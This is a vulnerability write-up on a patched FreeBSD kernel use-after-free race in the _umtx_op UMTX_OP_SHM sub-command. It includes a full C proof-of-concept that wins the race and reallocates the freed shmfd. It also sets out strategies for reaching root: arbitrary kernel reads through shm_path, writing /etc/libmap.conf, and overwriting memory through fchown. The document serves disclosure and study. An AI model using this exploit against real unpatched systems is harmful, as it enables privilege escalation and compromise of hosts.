FreeBSD 11.0+ Kernel LPE: Userspace Mutexes (umtx) Use-After-Free Race Condition
Introduction
Since 11.0-RELEASE, the FreeBSD kernel has contained a race condition vulnerability in the _umtx_op syscall leading to an exploitable use-after-free. It affects up to and including the latest release at the time of writing, 14.1-RELEASE.

This report discusses the vulnerability in depth and explores exploitation options, leading to one that results in gaining root privileges from any unprivileged user.

I originally discovered the vulnerability some time last year, but it has since been independently discovered by Synacktiv and patched as of September 2024. As I hadn't done anything with my research beforehand, I'll now share it here.
Vulnerability Overview
The _umtx_op syscall implements userland threading primitives. The syscall takes an "operation" argument that describes the sub-command to perform. Sub-commands are provided for dealing with mutexes, condition variables, semaphores and other objects one would associate with threading.

One of these sub-commands, introduced in FreeBSD 11.0, is UMTX_OP_SHM. This sub-command is used for managing process-wide shared memory handles: creating them, destroying them and looking them up.
This UMTX_OP_SHM sub-command suffers from a race condition when it comes to destroying a shared memory handle, and this is the crux of the vulnerability: by racing the destruction of the same handle at the same time, it's possible for the destruction logic to run twice. Racing this with a third thread can result in a file descriptor with a dangling struct shmfd pointer through its f_data field.
An in-depth discussion with full details can be found in the Vulnerability Details section.
Exploitation Options
By reallocating into the UAF hole and interacting with the file descriptor obtained through the vulnerability, we are able to read and write to other structures on the heap. To make use of this, we need to understand what other data we could have reallocated into the hole and then look for interesting ways to manipulate it through the relevant fileops table: shm_ops in this case.
The struct shmfd is allocated from the general purpose heap rather than a dedicated zone, greatly increasing our options for reallocating into the hole. Even so, there does not seem to be an immediately straightforward option here.
A much simpler approach is to leverage the vulnerability to cause a double-free in the kernel. Double-frees are not detected by the FreeBSD kernel, and by inducing this condition we free ourselves from being limited to shm_ops for interacting with the backing data: we are able to alias two completely different objects instead.
Full details of how this works to our advantage are covered in Exploitation.
Vulnerability Details
The prototype for the _umtx_op syscall can be found in /usr/include/sys/umtx.h:
int _umtx_op(void *obj, int op, u_long val, void *uaddr, void *uaddr2);
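To give a flavour of the interface before diving in, here is a minimal sketch of the classic wait/wake pattern (my own illustration, not taken from the exploit, assuming the documented semantics: UMTX_OP_WAIT sleeps while *obj still equals val, and UMTX_OP_WAKE wakes up to val waiters):

#include <sys/types.h>
#include <sys/umtx.h>

static u_long futex_word = 0;

/* Sleeper: blocks for as long as futex_word still holds 0. */
static void
wait_on_word(void)
{
    _umtx_op(&futex_word, UMTX_OP_WAIT, 0, NULL, NULL);
}

/* Waker: flips the word and wakes a single sleeping thread. */
static void
wake_one(void)
{
    futex_word = 1;
    _umtx_op(&futex_word, UMTX_OP_WAKE, 1, NULL, NULL);
}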
The entry point in the kernel for this syscall is in sys/kern/kern_umtx.c:
int
sys__umtx_op(struct thread *td, struct _umtx_op_args *uap)
{
    static const struct umtx_copyops *umtx_ops;

    umtx_ops = &umtx_native_ops;
#ifdef __LP64__
    if ((uap->op & (UMTX_OP__32BIT | UMTX_OP__I386)) != 0) {
        if ((uap->op & UMTX_OP__I386) != 0)
            umtx_ops = &umtx_native_opsi386;
        else
            umtx_ops = &umtx_native_opsx32;
    }
#elif !defined(__i386__)
    /* We consider UMTX_OP__32BIT a nop on !i386 ILP32. */
    if ((uap->op & UMTX_OP__I386) != 0)
        umtx_ops = &umtx_native_opsi386;
#else
    /* Likewise, UMTX_OP__I386 is a nop on i386. */
    if ((uap->op & UMTX_OP__32BIT) != 0)
        umtx_ops = &umtx_native_opsx32;
#endif
[1] return (kern__umtx_op(td, uap->obj, uap->op, uap->val, uap->uaddr1,
        uap->uaddr2, umtx_ops));
}
Some accommodations for 32-bit processes running on a 64-bit kernel are made here, but otherwise our interest follows to kern__umtx_op [1].
static int
kern__umtx_op(struct thread *td, void *obj, int op, unsigned long val,
    void *uaddr1, void *uaddr2, const struct umtx_copyops *ops)
{
    struct _umtx_op_args uap = {
        .obj = obj,
        .op = op & ~UMTX_OP__FLAGS,
        .val = val,
        .uaddr1 = uaddr1,
        .uaddr2 = uaddr2
    };

    if (uap.op >= nitems(op_table))
        return (EINVAL);
[2] return ((*op_table[uap.op])(td, &uap, ops));
}
This function simply prepares an argument structure and calls off into a function pointer from the op_table table [2]. Looking at this table, we can see a full list of all of the supported operations:
static const _umtx_op_func op_table[] = {
#ifdef COMPAT_FREEBSD10
    [UMTX_OP_LOCK] = __umtx_op_lock_umtx,
    [UMTX_OP_UNLOCK] = __umtx_op_unlock_umtx,
#else
    [UMTX_OP_LOCK] = __umtx_op_unimpl,
    [UMTX_OP_UNLOCK] = __umtx_op_unimpl,
#endif
    [UMTX_OP_WAIT] = __umtx_op_wait,
    [UMTX_OP_WAKE] = __umtx_op_wake,
    [UMTX_OP_MUTEX_TRYLOCK] = __umtx_op_trylock_umutex,
    [UMTX_OP_MUTEX_LOCK] = __umtx_op_lock_umutex,
    [UMTX_OP_MUTEX_UNLOCK] = __umtx_op_unlock_umutex,
    [UMTX_OP_SET_CEILING] = __umtx_op_set_ceiling,
    [UMTX_OP_CV_WAIT] = __umtx_op_cv_wait,
    [UMTX_OP_CV_SIGNAL] = __umtx_op_cv_signal,
    [UMTX_OP_CV_BROADCAST] = __umtx_op_cv_broadcast,
    [UMTX_OP_WAIT_UINT] = __umtx_op_wait_uint,
    [UMTX_OP_RW_RDLOCK] = __umtx_op_rw_rdlock,
    [UMTX_OP_RW_WRLOCK] = __umtx_op_rw_wrlock,
    [UMTX_OP_RW_UNLOCK] = __umtx_op_rw_unlock,
    [UMTX_OP_WAIT_UINT_PRIVATE] = __umtx_op_wait_uint_private,
    [UMTX_OP_WAKE_PRIVATE] = __umtx_op_wake_private,
    [UMTX_OP_MUTEX_WAIT] = __umtx_op_wait_umutex,
    [UMTX_OP_MUTEX_WAKE] = __umtx_op_wake_umutex,
#if defined(COMPAT_FREEBSD9) || defined(COMPAT_FREEBSD10)
    [UMTX_OP_SEM_WAIT] = __umtx_op_sem_wait,
    [UMTX_OP_SEM_WAKE] = __umtx_op_sem_wake,
#else
    [UMTX_OP_SEM_WAIT] = __umtx_op_unimpl,
    [UMTX_OP_SEM_WAKE] = __umtx_op_unimpl,
#endif
    [UMTX_OP_NWAKE_PRIVATE] = __umtx_op_nwake_private,
    [UMTX_OP_MUTEX_WAKE2] = __umtx_op_wake2_umutex,
    [UMTX_OP_SEM2_WAIT] = __umtx_op_sem2_wait,
    [UMTX_OP_SEM2_WAKE] = __umtx_op_sem2_wake,
[3] [UMTX_OP_SHM] = __umtx_op_shm,
    [UMTX_OP_ROBUST_LISTS] = __umtx_op_robust_lists,
    [UMTX_OP_GET_MIN_TIMEOUT] = __umtx_op_get_min_timeout,
    [UMTX_OP_SET_MIN_TIMEOUT] = __umtx_op_set_min_timeout,
};
This gives us a good idea of what the _umtx_op syscall is really about. For the purposes of this vulnerability, we're interested in the UMTX_OP_SHM operation, which is implemented by __umtx_op_shm [3].
UMTX_OP_SHM
__umtx_op_shm extracts the two key parameters that came in from the _umtx_op syscall and passes them down to umtx_shm:
static int
__umtx_op_shm(struct thread *td, struct _umtx_op_args *uap,
    const struct umtx_copyops *ops __unused)
{
    return (umtx_shm(td, uap->uaddr1, uap->val));
}
umtx_shm is where the main logic lives:
static int
[1] umtx_shm(struct thread *td, void *addr, u_int flags)
{
    struct umtx_key key;
    struct umtx_shm_reg *reg;
    struct file *fp;
    int error, fd;

[2] if (__bitcount(flags & (UMTX_SHM_CREAT | UMTX_SHM_LOOKUP |
        UMTX_SHM_DESTROY | UMTX_SHM_ALIVE)) != 1)
        return (EINVAL);
    if ((flags & UMTX_SHM_ALIVE) != 0)
        return (umtx_shm_alive(td, addr));
[3] error = umtx_key_get(addr, TYPE_SHM, PROCESS_SHARE, &key);
    if (error != 0)
        return (error);
    KASSERT(key.shared == 1, ("non-shared key"));
    if ((flags & UMTX_SHM_CREAT) != 0) {
[4]     error = umtx_shm_create_reg(td, &key, &reg);
    } else {
[5]     reg = umtx_shm_find_reg(&key);
        if (reg == NULL)
            error = ESRCH;
    }
    umtx_key_release(&key);
    if (error != 0)
        return (error);
    KASSERT(reg != NULL, ("no reg"));
    if ((flags & UMTX_SHM_DESTROY) != 0) {
[6]     umtx_shm_unref_reg(reg, true);
    } else {
#if 0
#ifdef MAC
        error = mac_posixshm_check_open(td->td_ucred,
            reg->ushm_obj, FFLAGS(O_RDWR));
        if (error == 0)
#endif
            error = shm_access(reg->ushm_obj, td->td_ucred,
                FFLAGS(O_RDWR));
        if (error == 0)
#endif
[7]     error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
        if (error == 0) {
            shm_hold(reg->ushm_obj);
[8]         finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
                &shm_ops);
            td->td_retval[0] = fd;
            fdrop(fp, td);
        }
    }
[9] umtx_shm_unref_reg(reg, false);
    return (error);
}
This function isn't too long, but there are a few paths that we need to understand here. At a high level, before diving into details, it's useful to know that the whole purpose of UMTX_OP_SHM is to manage a registry of shared memory regions: it lets us create new regions and look up or destroy existing ones.
Beginning with the function signature [1], we see that our controlled inputs to the function are pretty simple: void *addr and u_int flags.

umtx shared memory regions are identified/keyed by virtual addresses in our process, and that's what addr is here. It doesn't matter what's stored at addr in our process — we just have to provide some memory address as a key.
flags is used to communicate what we want to do to the region mapped to that addr. It must be exactly one of [2]:

- UMTX_SHM_CREAT: Create a new SHM
- UMTX_SHM_LOOKUP: Look up an existing SHM
- UMTX_SHM_DESTROY: Destroy an existing SHM
- UMTX_SHM_ALIVE: Probe if an address maps to a SHM

We will ignore UMTX_SHM_ALIVE here because it's largely uninteresting.
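As a concrete feel for the sub-command, here is a minimal sketch of a create/lookup/destroy round-trip (error handling elided; this mirrors the PoC later in this report):

#include <sys/types.h>
#include <sys/umtx.h>
#include <unistd.h>

static char key; /* any address in our process works as the key */

static void
shm_roundtrip(void)
{
    int fd, fd2;

    /* Create a SHM keyed on &key; a file descriptor is returned. */
    fd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL);

    /* Look the same SHM up again: a second fd to the same object. */
    fd2 = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, &key, NULL);

    /* Remove it from the registry. */
    _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, &key, NULL);

    close(fd);
    close(fd2);
}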
With flags validated to be exactly one of these, the kernel then translates addr to a umtx_key [3] and begins doing work based on what was asked.
For UMTX_SHM_CREAT, the kernel uses umtx_shm_create_reg [4] to allocate a fresh umtx_shm_reg:
struct umtx_shm_reg {
    TAILQ_ENTRY(umtx_shm_reg) ushm_reg_link;
    LIST_ENTRY(umtx_shm_reg) ushm_obj_link;
    struct umtx_key ushm_key;
    struct ucred *ushm_cred;
    struct shmfd *ushm_obj;
    u_int ushm_refcnt;
    u_int ushm_flags;
};
This is the structure that's part of the global linked list of shared memory regions. There are some important fields to pay particular attention to here:

- ushm_refcnt is a refcount for the entry.
- ushm_obj is the actual shared memory object attached to the registry.

The ushm_obj can live longer than its registry entry, so it has its own refcount (->shm_refs).
The umtx_shm_create_reg function will create a new shmfd with ->shm_refs == 1 and a new umtx_shm_reg with ushm_refcnt == 2. The refcount is 2 because we have one reference in the registry list and one for the caller.
If instead of UMTX_SHM_CREAT the kernel is servicing a UMTX_SHM_LOOKUP or UMTX_SHM_DESTROY action, then an existing SHM needs to be resolved with umtx_shm_find_reg [5]. If that function succeeds in finding one, it takes a reference on ->ushm_refcnt and returns it.

Either way, if no error occurred, the kernel will now have a umtx_shm_reg pointer and own one reference.
Continuing on in the code, if the requested action was UMTX_SHM_DESTROY, then umtx_shm_unref_reg is called with its last argument as true [6]. This function decrements ->ushm_refcnt and, if the last argument is true, also removes the entry from the registry.

Otherwise, for UMTX_SHM_CREAT or UMTX_SHM_LOOKUP, the kernel allocates a new file descriptor [7] and attaches the struct shmfd from the registry entry to the file [8]. Since a pointer to the struct shmfd is being stored on the file, a reference on that object is taken with shm_hold.

Finally, we reach umtx_shm_unref_reg for all three of these actions [9]: this drops the reference taken when the entry was looked up or created.
Refcounting and Locking
Referring back to the code in the previous subsection, it's interesting to note that locking is only performed when creating or looking up a umtx_shm_reg.

For example, to look up an existing umtx_shm_reg, the kernel uses umtx_shm_find_reg:
static struct umtx_shm_reg *
umtx_shm_find_reg(const struct umtx_key *key)
{
    struct umtx_shm_reg *reg;

    mtx_lock(&umtx_shm_lock);
    reg = umtx_shm_find_reg_locked(key);
    mtx_unlock(&umtx_shm_lock);
    return (reg);
}
Similarly, when a reference is dropped on the umtx_shm_reg, locking is done internally:
static bool
umtx_shm_unref_reg_locked(struct umtx_shm_reg *reg, bool force)
{
    bool res;

    mtx_assert(&umtx_shm_lock, MA_OWNED);
    KASSERT(reg->ushm_refcnt > 0, ("ushm_reg %p refcnt 0", reg));
    reg->ushm_refcnt--;
    res = reg->ushm_refcnt == 0;
    if (res || force) {
        if ((reg->ushm_flags & USHMF_REG_LINKED) != 0) {
            TAILQ_REMOVE(&umtx_shm_registry[reg->ushm_key.hash],
                reg, ushm_reg_link);
            reg->ushm_flags &= ~USHMF_REG_LINKED;
        }
        if ((reg->ushm_flags & USHMF_OBJ_LINKED) != 0) {
            LIST_REMOVE(reg, ushm_obj_link);
            reg->ushm_flags &= ~USHMF_OBJ_LINKED;
        }
    }
    return (res);
}

static void
umtx_shm_unref_reg(struct umtx_shm_reg *reg, bool force)
{
    vm_object_t object;
    bool dofree;

    if (force) {
        object = reg->ushm_obj->shm_object;
        VM_OBJECT_WLOCK(object);
        vm_object_set_flag(object, OBJ_UMTXDEAD);
        VM_OBJECT_WUNLOCK(object);
    }
    mtx_lock(&umtx_shm_lock);
    dofree = umtx_shm_unref_reg_locked(reg, force);
    mtx_unlock(&umtx_shm_lock);
    if (dofree)
        umtx_shm_free_reg(reg);
}
This locking ensures that the reference counting is consistent, amongst other things, but it fails to protect umtx_shm_find_reg from finding a umtx_shm_reg that's in the process of being destroyed.
Consider what happens when UMTX_SHM_DESTROY is serviced:

1. The umtx_shm_reg is found with umtx_shm_find_reg (->ushm_refcnt++)
2. umtx_shm_unref_reg is called with force == true (->ushm_refcnt--)
3. umtx_shm_unref_reg is called with force == false (->ushm_refcnt--)
The net effect of this operation is to decrease ushm_refcnt by 1. Until step 2 is completed, however, it's still possible to find the same umtx_shm_reg with umtx_shm_find_reg.

Therefore, by racing two concurrent UMTX_SHM_DESTROY actions for the same addr, it's possible to have a net effect of decreasing the ushm_refcnt by 2 instead.
This is the core vulnerability.
Refcount Analysis
By considering two concurrent threads, Thread A and Thread B, both executing a UMTX_SHM_DESTROY for the same SHM, we can see how the refcount value fluctuates.

We start with a simple umtx_shm_reg in the registry. In this state, ->ushm_refcnt == 1 and ->ushm_obj->shm_refs == 1.
We will use the numbered steps for our analysis:
1. umtx_shm_find_reg => ->ushm_refcnt++
2. umtx_shm_unref_reg(..., true) => ->ushm_refcnt--
3. umtx_shm_unref_reg(..., false) => ->ushm_refcnt--
One possible scenario is:
- Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
- Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
- Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
- Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 1
- Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg FREED
  - As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
    - ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
- Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == -1 (on freed data)
There are only a couple of ways this race can play out, because if either thread hits Step 2 before the other hits Step 1, the umtx_shm_reg won't be found. So this is really the only possible net effect of the race: the last umtx_shm_unref_reg operates on freed data.
Introducing a Third Thread
The discovery that the final umtx_shm_unref_reg operates on freed data is only mildly interesting at first glance. Surely, to be of use, we'd have to race an allocation before that last call and have the decrement be meaningful?

Consider instead what happens if we introduce a third thread to this race — but this time the thread is performing a UMTX_SHM_LOOKUP:
- Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
- Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
- Thread C: umtx_shm_find_reg => ->ushm_refcnt++ => ->ushm_refcnt == 4
- Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 3
- Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
- Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 1
- Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg FREED
  - As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
    - ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
- Thread C:
  - Allocate fd in process (falloc_caps)
  - shm_hold(reg->ushm_obj) => ->shm_refs++ (on freed data)
  - Attach reg->ushm_obj (freed) to the allocated file (finit)
  - ->ushm_refcnt-- => ->ushm_refcnt == -1
Now, because Thread B reached Step 3 before Thread C could call shm_hold, Thread C has allocated a file in the process with a dangling f_data: it points to the freed struct shmfd.

It is of course possible for this race to turn out differently: Thread C could call shm_hold before Thread B hits Step 3, in which case f_data will not be dangling.
We can detect the right condition by inspecting the file we get back from Thread C. But before we even do that, we need to check that:

- _umtx_op(UMTX_SHM_DESTROY) in Thread A returned 0 (=> success).
- _umtx_op(UMTX_SHM_DESTROY) in Thread B returned 0 (=> success).
- _umtx_op(UMTX_SHM_LOOKUP) in Thread C returned > 0 (=> success, file descriptor returned).
When all of these conditions are detected, we can then try to trigger a controlled allocation into the correct kernel malloc bucket and read some value from our file descriptor to see if it contains a value we chose.

Looking at shmfd, there are a few candidate fields:
struct shmfd {
    vm_ooffset_t shm_size;
    vm_object_t shm_object;
    vm_pindex_t shm_pages; /* allocated pages */
    int shm_refs;
    uid_t shm_uid;
    gid_t shm_gid;
    mode_t shm_mode;
    int shm_kmappings;
    /*
     * Values maintained solely to make this a better-behaved file
     * descriptor for fstat() to run on.
     */
    struct timespec shm_atime;
    struct timespec shm_mtime;
    struct timespec shm_ctime;
    struct timespec shm_birthtime;
    ino_t shm_ino;
    struct label *shm_label; /* MAC label */
    const char *shm_path;
    struct rangelock shm_rl;
    struct mtx shm_mtx;
    int shm_flags;
    int shm_seals;
    /* largepage config */
    int shm_lp_psind;
    int shm_lp_alloc_policy;
};
Reading out of them requires using a function from the shm_ops table:
struct fileops shm_ops = {
    .fo_read = shm_read,
    .fo_write = shm_write,
    .fo_truncate = shm_truncate,
    .fo_ioctl = shm_ioctl,
    .fo_poll = invfo_poll,
    .fo_kqfilter = invfo_kqfilter,
    .fo_stat = shm_stat,
    .fo_close = shm_close,
    .fo_chmod = shm_chmod,
    .fo_chown = shm_chown,
    .fo_sendfile = vn_sendfile,
    .fo_seek = shm_seek,
    .fo_fill_kinfo = shm_fill_kinfo,
    .fo_mmap = shm_mmap,
    .fo_get_seals = shm_get_seals,
    .fo_add_seals = shm_add_seals,
    .fo_fallocate = shm_fallocate,
    .fo_fspacectl = shm_fspacectl,
    .fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
We do need to be careful, however: some of these functions will attempt to interact with structures such as the struct rangelock — and these are expected to contain legitimate kernel pointers.
The shm_get_seals function is one good candidate: it can be invoked through fcntl(fd, F_GET_SEALS) and simply returns the value of ->shm_seals. It should be noted, however, that this field isn't present on older versions of FreeBSD.
One field that has existed since UMTX_OP_SHM was first introduced is shm_mode. This is the file permissions mode of the shmfd and it's initialised to O_RDWR when a shmfd is allocated by umtx_shm_create_reg:
static int
umtx_shm_create_reg(struct thread *td, const struct umtx_key *key,
    struct umtx_shm_reg **res)
{
    struct umtx_shm_reg *reg, *reg1;
    ...
    reg = uma_zalloc(umtx_shm_reg_zone, M_WAITOK | M_ZERO);
    reg->ushm_refcnt = 1;
    bcopy(key, &reg->ushm_key, sizeof(*key));
    reg->ushm_obj = shm_alloc(td->td_ucred, O_RDWR, false);
    ...
Attempting to fchmod (via shm_chmod) to the same mode will always succeed, but if we've replaced the shm_mode field with something like zeroes, it will fail.
Therefore, once we've observed the desired return values from _umtx_op across all 3 threads, our next steps should be:

- Try to force a kernel allocation of zeroes.
- Attempt to fchmod(thread_c_result, O_RDWR).
If the fchmod fails, then we know that we've triggered the exact sequence of thread execution that we need.
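Sketched out (a hedged illustration: spray_zeroes is a hypothetical stand-in for whichever reallocation primitive we use, and thread_c_result is the fd returned by Thread C):

#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>

extern void spray_zeroes(void); /* hypothetical helper */

static int
race_won(int thread_c_result)
{
    spray_zeroes();
    /* shm_mode normally holds O_RDWR; once the slot reads zeroes,
     * shm_chmod's permission check fails and so does fchmod. */
    return (fchmod(thread_c_result, O_RDWR) == -1);
}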
Strategy Proof-of-Concept
With a strategy in hand, we can now write a proof-of-concept that should trigger the vulnerability.
We will assume a modern version of FreeBSD and opt to read the shm_seals field to detect a successful kernel allocation. For simplicity, we will use a bogus ioctl(2) call to attempt a controlled allocation into the correct bucket.

The ioctl(2) technique only gives a transient allocation — enough to place data for a test — but we will use something more stable, such as cap_ioctls_limit, when building a functioning exploit (discussed later).
The code for the strategy PoC is:
/*
 * cc -pthread -o umtx-poc umtx-poc.c
 */
#define _WANT_FILE
#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/umtx.h>
#include <unistd.h>

static volatile int a_ready = 0;
static volatile int b_ready = 0;
static volatile int c_ready = 0;

static volatile int a_result = 0;
static volatile int b_result = 0;
static volatile int c_result = 0;

static void
pin_thread_to_cpu(int which)
{
    cpuset_t cs;

    CPU_ZERO(&cs);
    CPU_SET(which, &cs);
    if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1,
        sizeof(cs), &cs))
        err(1, "[%s] cpuset_setaffinity", __FUNCTION__);
}

static void *
thread_a(void *key)
{
    pin_thread_to_cpu(1);
    a_ready = 1;
    while (!b_ready && !c_ready)
        ;
    a_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
    return NULL;
}

static void *
thread_b(void *key)
{
    pin_thread_to_cpu(2);
    b_ready = 1;
    while (!a_ready && !c_ready)
        ;
    b_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
    return NULL;
}

static void *
thread_c(void *key)
{
    pin_thread_to_cpu(0);
    c_ready = 1;
    while (!a_ready && !b_ready)
        ;
    c_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
    return NULL;
}

int
main(int argc, char *argv[])
{
    char key = 0;
    pthread_t ta;
    pthread_t tb;
    pthread_t tc;
    unsigned char aaaa_buffer[sizeof(struct shmfd)];
    int seals;
    int shmfd;

    /* prepare the spray buffer. */
    memset(aaaa_buffer, 0x41, sizeof(aaaa_buffer));

    /* pin to the same CPU as Thread C: */
    pin_thread_to_cpu(0);

    printf("[+] racing...\n");
    for (;;) {
        a_ready = 0;
        b_ready = 0;
        c_ready = 0;

        a_result = 0;
        b_result = 0;
        c_result = 0;

        /* create a SHM for the threads to find, but close the fd. */
        if (-1 == (shmfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT,
            &key, NULL)))
            err(1, "[%s] _umtx_op", __FUNCTION__);
        close(shmfd);

        if (pthread_create(&ta, NULL, thread_a, &key) ||
            pthread_create(&tb, NULL, thread_b, &key) ||
            pthread_create(&tc, NULL, thread_c, &key))
            errx(1, "[%s] pthread_create failed", __FUNCTION__);

        if (pthread_join(ta, NULL) ||
            pthread_join(tb, NULL) ||
            pthread_join(tc, NULL))
            errx(1, "[%s] pthread_join failed", __FUNCTION__);

        if (!a_result && !b_result && c_result > 0) {
            /* check if we now have a dangling shmfd in c_result: */
            ioctl(-1, _IOW(0, 0, aaaa_buffer), aaaa_buffer);
            if (0x41414141 == (seals = fcntl(c_result, F_GET_SEALS))) {
                printf("[+] success! shm_seals: 0x%x\n", seals);
                break;
            }
        }
        close(c_result);
    }

    return 0;
}
This works as expected:
$ cc -pthread -o umtx-poc umtx-poc.c && ./umtx-poc
[+] racing...
[+] success! shm_seals: 0x41414141
Exploitation
Triggering the umtx vulnerability leaves us in a state where we have a file descriptor to a file that has a freed struct shmfd hanging from its f_data pointer. As demonstrated at the end of the previous section, we can trivially reallocate into this freed memory and observe the effects.

The shape of a struct shmfd on the latest release at the time of writing is:
struct shmfd {
    vm_ooffset_t shm_size;
[1] vm_object_t shm_object;
    vm_pindex_t shm_pages; /* allocated pages */
    int shm_refs;
    uid_t shm_uid;
    gid_t shm_gid;
    mode_t shm_mode;
    int shm_kmappings;
    /*
     * Values maintained solely to make this a better-behaved file
     * descriptor for fstat() to run on.
     */
    struct timespec shm_atime;
    struct timespec shm_mtime;
    struct timespec shm_ctime;
    struct timespec shm_birthtime;
    ino_t shm_ino;
    struct label *shm_label; /* MAC label */
[2] const char *shm_path;
    struct rangelock shm_rl;
    struct mtx shm_mtx;
    int shm_flags;
    int shm_seals;
    /* largepage config */
    int shm_lp_psind;
    int shm_lp_alloc_policy;
};
This is an interesting structure to have control over. Some example fields that could be useful:
- shm_object [1]: This will be a dangling vm_object_t pointer. Reallocating that vm_object_t could provide a nice primitive: e.g. if we can have it reallocated as the vm_object_t backing a file that we're only able to open O_RDONLY, the permissions we have on the shmfd (in shm_mode) may allow us to mmap the file as PROT_READ | PROT_WRITE. Using this to gain write access to something like /etc/libmap.conf would lead to a trivial privilege escalation.
- shm_path [2]: We can gain an arbitrary read through this pointer by controlling it and calling fcntl(fd, F_KINFO). That ends up reaching shm_fill_kinfo_locked, which will do a strlcpy from that address into a buffer to return to userland. Systematically increasing that shm_path then allows us to read onwards past '\0' bytes (see the sketch below).
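To make the shm_path idea concrete, here is a hedged sketch of the resulting read primitive, assuming we can repeatedly plant a fake shmfd whose shm_path points at an address of our choosing:

#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/user.h>

/*
 * Sketch: after pointing the fake shmfd's shm_path at a kernel
 * address, F_KINFO copies the "path" out to userland for us.
 */
static size_t
kread_string(int fd, char *out, size_t outlen)
{
    struct kinfo_file kif;

    kif.kf_structsize = sizeof(kif);
    if (fcntl(fd, F_KINFO, &kif) == -1)
        return 0;
    strlcpy(out, kif.kf_path, outlen); /* bytes up to the first '\0' */
    return strlen(out);
}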
Many of the ways we interact with this file descriptor will result in one of the specialised fileops functions being called. For this specific type of file, the relevant fileops table is shm_ops:
struct fileops shm_ops = {
    .fo_read = shm_read,
    .fo_write = shm_write,
    .fo_truncate = shm_truncate,
    .fo_ioctl = shm_ioctl,
    .fo_poll = invfo_poll,
    .fo_kqfilter = invfo_kqfilter,
    .fo_stat = shm_stat,
    .fo_close = shm_close,
    .fo_chmod = shm_chmod,
    .fo_chown = shm_chown,
    .fo_sendfile = vn_sendfile,
    .fo_seek = shm_seek,
    .fo_fill_kinfo = shm_fill_kinfo,
    .fo_mmap = shm_mmap,
    .fo_get_seals = shm_get_seals,
    .fo_add_seals = shm_add_seals,
    .fo_fallocate = shm_fallocate,
    .fo_fspacectl = shm_fspacectl,
    .fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
};
As noted in the previous section, many of these functions interact with the struct shmfd in a way that expects valid kernel pointers to exist. This complicates things for targeting some of the shmfd fields. For example, many of the operations will try to acquire a range lock, interacting with queues and pointers on both shm_rl and shm_mtx.
Kernel information disclosure vulnerabilities are not rare on FreeBSD, but it still feels sub-optimal to rely on further vulnerabilities to make good use of this bug.
Writing through shm_uid / shm_gid

One of the shm_ops functions that avoids referencing pointers from the shmfd struct is shm_chown:
static int
shm_chown(struct file *fp, uid_t uid, gid_t gid, struct ucred *active_cred,
    struct thread *td)
{
    struct shmfd *shmfd;
    int error;

    error = 0;
[1] shmfd = fp->f_data;
    mtx_lock(&shm_timestamp_lock);
#ifdef MAC
    error = mac_posixshm_check_setowner(active_cred, shmfd, uid, gid);
    if (error != 0)
        goto out;
#endif
[2] if (uid == (uid_t)-1)
        uid = shmfd->shm_uid;
[3] if (gid == (gid_t)-1)
        gid = shmfd->shm_gid;
    if (((uid != shmfd->shm_uid && uid != active_cred->cr_uid) ||
[4]     (gid != shmfd->shm_gid && !groupmember(gid, active_cred))) &&
        (error = priv_check_cred(active_cred, PRIV_VFS_CHOWN)))
        goto out;
[5] shmfd->shm_uid = uid;
[6] shmfd->shm_gid = gid;
out:
    mtx_unlock(&shm_timestamp_lock);
    return (error);
}
This function provides the implementation of fchown for a shmfd and is fairly simple. First, the shmfd pointer (the pointer to the freed data we can control) is taken at [1]. The uid and gid arguments to fchown are considered next: we can pass -1 as either of these to leave each value unchanged, which is handled at [2] and [3].

Next is a permissions check. If we're attempting to change shm_uid to anything other than our current cr_uid, or if we're trying to change shm_gid to a group of which we're not a member [4], then this will fail. Otherwise, the fields are written [5], [6].
Targeting shm_uid and shm_gid this way is potentially interesting: whatever value happens to be in memory for those fields can be replaced with our current uid and gid (or any gid we're a member of).
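In userland terms, this is just an fchown on the dangling descriptor (a hedged sketch; uaf_fd is the fd obtained from the race):

#include <err.h>
#include <unistd.h>

static void
overwrite_gid_slot(int uaf_fd)
{
    /* Whatever object now overlaps the freed shmfd gets our gid
     * written at the shm_gid offset; passing -1 leaves the shm_uid
     * slot logically unchanged. */
    if (fchown(uaf_fd, -1, getgid()) == -1)
        warn("fchown");
}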
We would have to find a useful struct to allocate into this memory that has a useful field at the shm_uid and shm_gid offsets, of course.
